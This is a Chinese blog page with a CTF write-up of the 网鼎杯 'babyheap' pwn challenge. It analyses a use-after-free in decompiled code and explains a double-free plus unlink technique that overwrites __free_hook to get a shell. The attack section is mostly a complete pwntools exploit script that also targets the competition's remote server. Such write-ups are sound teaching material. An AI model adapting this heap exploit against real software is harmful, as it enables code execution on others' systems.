<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="n74fzVGuzCcR7QhYWu-qaPH7lKOjZC3b3tDU0egKMNA" />














  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="网鼎杯pwn-babyheap题目链接如下： 链接：https://pan.baidu.com/s/19Imm-V-i71vpEN1mofwOhQ 密码：isek 题目分析程序提供了下面几种功能：  alloc：  程序在分配堆时，对分配的数量进行了限制，分配的数量最多为10个。且分配的堆大小为0x20字节，并将得到的指针保存到了bss段上。1234567891011121314151617181">
<meta property="og:type" content="article">
<meta property="og:title" content="网鼎杯-babyheap">
<meta property="og:url" content="https://e3pem.github.io/2018/09/30/wangdingbei/网鼎杯pwn-babyheap/index.html">
<meta property="og:site_name" content="e3pem&#39;s Blog">
<meta property="og:description" content="网鼎杯pwn-babyheap题目链接如下： 链接：https://pan.baidu.com/s/19Imm-V-i71vpEN1mofwOhQ 密码：isek 题目分析程序提供了下面几种功能：  alloc：  程序在分配堆时，对分配的数量进行了限制，分配的数量最多为10个。且分配的堆大小为0x20字节，并将得到的指针保存到了bss段上。1234567891011121314151617181">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://oslgqkd4w.bkt.clouddn.com/18-8-21/52659635.jpg">
<meta property="og:updated_time" content="2018-09-30T15:43:47.837Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="网鼎杯-babyheap">
<meta name="twitter:description" content="网鼎杯pwn-babyheap题目链接如下： 链接：https://pan.baidu.com/s/19Imm-V-i71vpEN1mofwOhQ 密码：isek 题目分析程序提供了下面几种功能：  alloc：  程序在分配堆时，对分配的数量进行了限制，分配的数量最多为10个。且分配的堆大小为0x20字节，并将得到的指针保存到了bss段上。1234567891011121314151617181">
<meta name="twitter:image" content="http://oslgqkd4w.bkt.clouddn.com/18-8-21/52659635.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://e3pem.github.io/2018/09/30/wangdingbei/网鼎杯pwn-babyheap/"/>





  <title>网鼎杯-babyheap | e3pem's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">e3pem's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://e3pem.github.io/2018/09/30/wangdingbei/网鼎杯pwn-babyheap/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="e3pem">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="e3pem's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">网鼎杯-babyheap</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-09-30T23:43:08+08:00">
                2018-09-30
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="网鼎杯pwn-babyheap"><a href="#网鼎杯pwn-babyheap" class="headerlink" title="网鼎杯pwn-babyheap"></a>网鼎杯pwn-babyheap</h1><p>题目链接如下：</p>
<p>链接：<a href="https://pan.baidu.com/s/19Imm-V-i71vpEN1mofwOhQ" target="_blank" rel="noopener">https://pan.baidu.com/s/19Imm-V-i71vpEN1mofwOhQ</a> 密码：isek</p>
<h2 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h2><p>程序提供了下面几种功能：<br><img src="http://oslgqkd4w.bkt.clouddn.com/18-8-21/52659635.jpg" alt=""></p>
<ul>
<li>alloc：</li>
</ul>
<p>程序在分配堆时，对分配的数量进行了限制，分配的数量最多为10个。且分配的堆大小为0x20字节，并将得到的指针保存到了bss段上。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">__<span class="function">int64 <span class="title">alloc</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// [sp+Ch] [bp-24h]@1</span></span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [sp+10h] [bp-20h]@1</span></span><br><span class="line">  __int64 v3; <span class="comment">// [sp+28h] [bp-8h]@1</span></span><br><span class="line"></span><br><span class="line">  v3 = *MK_FP(__FS__, <span class="number">40L</span>L);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Index:"</span>);</span><br><span class="line">  <span class="built_in">memset</span>(&amp;s, <span class="number">0</span>, <span class="number">0x10</span>uLL);</span><br><span class="line">  read(<span class="number">0</span>, &amp;s, <span class="number">0xF</span>uLL);</span><br><span class="line">  v1 = atoi(&amp;s);</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)v1 &lt;= <span class="number">9</span> &amp;&amp; !*(_QWORD *)&amp;ptr[<span class="number">8</span> * v1] )</span><br><span class="line">  &#123;</span><br><span class="line">    *(_QWORD *)&amp;ptr[<span class="number">8</span> * v1] = <span class="built_in">malloc</span>(<span class="number">0x20</span>uLL);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Content:"</span>, &amp;s);</span><br><span class="line">    get_input(*(_QWORD *)&amp;ptr[<span class="number">8</span> * v1], <span class="number">0x20</span>u);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Done!"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> *MK_FP(__FS__, <span class="number">40L</span>L) ^ v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<ul>
<li>edit：</li>
</ul>
<p>edit对指定下标的堆块进行编辑，但是对编辑的次数进行了限制，最多只能编辑三次，用0x6020b0处的值来计数。</p>
<ul>
<li>show：</li>
</ul>
<p>显示指定下标处对应的堆块的内容。</p>
<ul>
<li>free：</li>
</ul>
<p>将指定下标对应的堆块free掉，但是free掉之后未将对应处的值设置为NULL</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">__<span class="function">int64 <span class="title">free_1</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// [sp+Ch] [bp-24h]@1</span></span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [sp+10h] [bp-20h]@1</span></span><br><span class="line">  __int64 v3; <span class="comment">// [sp+28h] [bp-8h]@1</span></span><br><span class="line"></span><br><span class="line">  v3 = *MK_FP(__FS__, <span class="number">40L</span>L);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Index:"</span>);</span><br><span class="line">  <span class="built_in">memset</span>(&amp;s, <span class="number">0</span>, <span class="number">0x10</span>uLL);</span><br><span class="line">  read(<span class="number">0</span>, &amp;s, <span class="number">0xF</span>uLL);</span><br><span class="line">  v1 = atoi(&amp;s);</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)v1 &lt;= <span class="number">9</span> &amp;&amp; *(_QWORD *)&amp;ptr[<span class="number">8</span> * v1] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">free</span>(*(<span class="keyword">void</span> **)&amp;ptr[<span class="number">8</span> * v1]);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Done!"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> *MK_FP(__FS__, <span class="number">40L</span>L) ^ v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h2><p>程序在free后为将指针设置为NULL，导致释放后仍可以往chunk中写入数据</p>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><p>程序开启了NX、FULL RELRO以及canary<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ checksec babyheap </span><br><span class="line">[*] &apos;/home/ym/Desktop/ctf/wdb/babyheap/babyheap&apos;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Full RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure></p>
<p>所以不能通过修改got表来控制程序流程。同时分配的chunk的大小是不可控的（chunk大小为0x30），而且程序对分配的次数、对chunk编辑的次数都进行了限制。</p>
<p>利用fastbin attack，首先想到的是double free，利用double free可以分配指定地方的内存，但是需要绕过对chunk size字段的检测，这里在bss段上没有我们能控制的内容。</p>
<p>往bss段上写数据可以采用unlink，unlink只需要我们能够伪造chunk就行。但是这里又有一个问题，为了触发unlink，被free的chunk大小不能在fastbin范围内，而分配的chunk大小全为0x30.</p>
<p>这里将double free和unlink结合起来，利用double free在堆上分配一块虚假的chunk，并编辑该chunk，再利用unlink往bss段上写入数据，往bss段上写数据后就能做到任意地址写入，这样通过将控制编辑chunk次数的字段设置为0就能绕过写入次数的限制了，利用任意地址写入往_free_hook中写入system的地址或是one_gadget即可拿到shell。</p>
<p>在进行double free时需要控制size字段，分配的堆块内容是可控的，只需要知道堆块的地址就可以利用double free，而根据fastbin机制，在free后会在fd字段存储下一个fastbin chunk的地址，这样通过show函数就可以泄露堆的地址了。</p>
<h2 id="利用代码"><a href="#利用代码" class="headerlink" title="利用代码"></a>利用代码</h2><p>exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">'amd64'</span>, os=<span class="string">'linux'</span>, endian=<span class="string">'little'</span>)</span><br><span class="line"><span class="comment"># context.log_level='debug'</span></span><br><span class="line">debug=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">	p = process(<span class="string">'./babyheap'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p = remote(<span class="string">'106.75.67.115'</span>,<span class="number">9999</span>)</span><br><span class="line">elf = ELF(<span class="string">'./babyheap'</span>)</span><br><span class="line">libc = ELF(<span class="string">'./libc.so.6'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">alloc</span><span class="params">(idx,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Choice:'</span>)</span><br><span class="line">	p.sendline(str(<span class="number">1</span>))</span><br><span class="line">	p.recvuntil(<span class="string">'Index:'</span>)</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line">	p.recvuntil(<span class="string">'Content'</span>)</span><br><span class="line">	<span class="keyword">if</span>(len(content)&lt;<span class="number">0x20</span>):</span><br><span class="line">		p.sendline(content)</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		p.send(content)	</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(idx,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Choice:'</span>)</span><br><span class="line">	p.sendline(str(<span class="number">2</span>))</span><br><span class="line">	p.recvuntil(<span class="string">'Index:'</span>)</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line">	p.recvuntil(<span class="string">'Content'</span>)</span><br><span class="line">	p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">(idx)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Choice:'</span>)</span><br><span class="line">	p.sendline(str(<span class="number">3</span>))</span><br><span class="line">	p.recvuntil(<span class="string">'Index:'</span>)</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">release</span><span class="params">(idx)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Choice:'</span>)</span><br><span class="line">	p.sendline(str(<span class="number">4</span>))</span><br><span class="line">	p.recvuntil(<span class="string">'Index:'</span>)</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 任意地址写入的函数</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span><span class="params">(target,value)</span>:</span></span><br><span class="line">	edit(<span class="number">5</span>,p64(<span class="number">0</span>))</span><br><span class="line">	edit(<span class="number">7</span>,p64(target)+p64(<span class="number">0x6020b0</span>))</span><br><span class="line">	edit(<span class="number">5</span>,p64(<span class="number">0</span>))</span><br><span class="line">	edit(<span class="number">4</span>,value)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0</span>) <span class="comment">#fake prev_size</span></span><br><span class="line">payload += p64(<span class="number">0x31</span>) <span class="comment">#fake chunk size</span></span><br><span class="line">alloc(<span class="number">0</span>,payload) <span class="comment">#chunk 0</span></span><br><span class="line">alloc(<span class="number">1</span>,payload) <span class="comment">#chunk 1</span></span><br><span class="line">alloc(<span class="number">2</span>,p64(<span class="number">0x30</span>)) <span class="comment">#chunk 2</span></span><br><span class="line">alloc(<span class="number">3</span>,<span class="string">'/bin/sh\x00'</span>) <span class="comment">#chunk 3***</span></span><br><span class="line">alloc(<span class="number">4</span>,<span class="string">'cccc'</span>) <span class="comment">#chunk 4</span></span><br><span class="line">alloc(<span class="number">5</span>,<span class="string">'dddd'</span>) <span class="comment">#chunk 5</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># double free : free阶段</span></span><br><span class="line">release(<span class="number">0</span>)</span><br><span class="line">release(<span class="number">1</span>)</span><br><span class="line">release(<span class="number">0</span>)</span><br><span class="line"><span class="comment"># info leak , leak heap addr</span></span><br><span class="line"><span class="comment"># chunk0-&gt;fd = chunk1</span></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">chunk1_addr = u64(p.recvuntil(<span class="string">'Done!'</span>)[:<span class="number">-6</span>].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line"><span class="keyword">print</span> <span class="string">'chunk1 addr is:'</span>+hex(chunk1_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment"># double free : malloc阶段</span></span><br><span class="line"><span class="comment"># use double free to malloc a fake chunk (chunk 0's data)</span></span><br><span class="line">alloc(<span class="number">6</span>,<span class="string">'aaaa'</span>) <span class="comment">#chunk 0</span></span><br><span class="line">alloc(<span class="number">7</span>,<span class="string">'cccc'</span>) <span class="comment">#chunk 1</span></span><br><span class="line"><span class="comment"># 将chunk0的fd指向chunk1的数据域，该数据域将用来伪造chunk，虚假chunk的size已被设置为0x31</span></span><br><span class="line">payload = p64(chunk1_addr+<span class="number">0x10</span>)</span><br><span class="line">edit(<span class="number">6</span>,payload) <span class="comment">#first edit</span></span><br><span class="line">alloc(<span class="number">8</span>,<span class="string">'ddddd'</span>) <span class="comment">#chunk 0</span></span><br><span class="line">target_addr = <span class="number">0x602098</span> <span class="comment"># ptr[7]--&gt;chunk 1</span></span><br><span class="line">fake_fd = target_addr<span class="number">-0x18</span></span><br><span class="line">fake_bk = target_addr<span class="number">-0x10</span></span><br><span class="line"><span class="comment"># 虚假chunk的值，fake_fd、fake_bk的值用来unlink</span></span><br><span class="line"><span class="comment"># 将chunk2的prev_size设置为0x20，size设置为0x90&gt;max_fast_bin</span></span><br><span class="line">payload = p64(fake_fd)+p64(fake_bk)</span><br><span class="line">payload += p64(<span class="number">0x20</span>)+p64(<span class="number">0x90</span>)</span><br><span class="line">alloc(<span class="number">9</span>,payload) <span class="comment">#fake chunk,size=0x30</span></span><br><span class="line"><span class="comment"># trigger unlink</span></span><br><span class="line">release(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 往ptr[7]中写入数据即往bss段上写入数据，ptr[4]-&gt;elf.got['puts']，ptr[5]-&gt;编辑的次数</span></span><br><span class="line">payload = p64(elf.got[<span class="string">'puts'</span>]) + p64(<span class="number">0x6020b0</span>)</span><br><span class="line">edit(<span class="number">7</span>,payload) <span class="comment">#second edit</span></span><br><span class="line"><span class="comment"># gadget = 0x45216 #condition:rax=0</span></span><br><span class="line">gadget = <span class="number">0x4526a</span> <span class="comment">#condition:rsp+0x30=NULL</span></span><br><span class="line"><span class="comment"># info leak: leak libc base addr</span></span><br><span class="line">show(<span class="number">4</span>)</span><br><span class="line">puts_addr = u64(p.recvuntil(<span class="string">'Done!'</span>)[:<span class="number">-6</span>].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line"><span class="keyword">print</span> <span class="string">'puts addr:'</span>+hex(puts_addr)</span><br><span class="line">base_adrr = puts_addr-libc.symbols[<span class="string">'puts'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">'base addr:'</span>+hex(base_adrr)</span><br><span class="line">free_hook = libc.symbols[<span class="string">'__free_hook'</span>]+base_adrr</span><br><span class="line"><span class="keyword">print</span> <span class="string">'free hook addr:'</span>+hex(free_hook)</span><br><span class="line">system_addr = libc.symbols[<span class="string">'system'</span>]+base_adrr</span><br><span class="line"><span class="keyword">print</span> <span class="string">'system addr:'</span>+hex(system_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 将free hook覆盖为system地址</span></span><br><span class="line"><span class="comment"># write(free_hook,p64(system_addr))</span></span><br><span class="line"><span class="comment"># # trigger free to run system</span></span><br><span class="line"><span class="comment"># release(3)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 将free hook覆盖为one gadget地址</span></span><br><span class="line">write(free_hook,p64(base_adrr+gadget))</span><br><span class="line">release(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/09/30/wangdingbei/网鼎杯pwn-blind/" rel="next" title="网鼎杯-blind">
                <i class="fa fa-chevron-left"></i> 网鼎杯-blind
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/01/杂项/在docker中搭建pwn环境/" rel="prev" title="在docker中搭建pwn环境">
                在docker中搭建pwn环境 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">e3pem</p>
              <p class="site-description motion-element" itemprop="description">记录学习过程的小Blog</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#网鼎杯pwn-babyheap"><span class="nav-number">1.</span> <span class="nav-text">网鼎杯pwn-babyheap</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#题目分析"><span class="nav-number">1.1.</span> <span class="nav-text">题目分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞"><span class="nav-number">1.2.</span> <span class="nav-text">漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用思路"><span class="nav-number">1.3.</span> <span class="nav-text">利用思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用代码"><span class="nav-number">1.4.</span> <span class="nav-text">利用代码</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">e3pem</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

